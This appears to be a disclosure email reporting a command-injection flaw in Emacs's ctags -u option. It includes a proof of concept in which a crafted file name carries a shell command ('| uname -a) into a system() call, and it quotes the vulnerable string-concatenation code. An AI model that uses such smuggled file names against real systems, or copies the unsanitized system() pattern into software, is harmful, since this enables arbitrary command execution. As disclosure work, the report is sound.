Hi, In ctags (Emacs <= 28.2.50) has a command execute vulnerability.

When using the -u parameter, ctags will execute external shell commands by calling the system() function, if there are special file names, unexpected shell commands may be executed. The example is as follows:


$ ls
etags.c

$ /usr/local/bin/ctags *.c
$ touch "'| uname -a #.c"
$ /usr/local/bin/ctags -u *.c
Linux mypc 6.0.8-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 11 15:09:04 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux


^C/usr/local/bin/ctags: failed to execute shell command


The vulnerability occurs in the following code:


char *z = stpcpy (cmd, "mv ");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
z = stpcpy (z, tagfile);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
z = stpcpy (z, " OTAGS;grep -Fv '\t");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
z = stpcpy (z, argbuffer[i].what);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
z = stpcpy (z, "\t' OTAGS &gt;");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
z = stpcpy (z, tagfile);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
strcpy (z, ";rm OTAGS");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
if (system (cmd) != EXIT_SUCCESS)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
&nbsp; fatal ("failed to execute shell command");&nbsp; &nbsp; &nbsp;



Because the file name is not checked, the file name is used as a concatenated string:


mv tags OTAGS;grep -Fv '	'| uname -a #.c	' OTAGS &gt;tags;rm OTAGS


Email attachments are patches.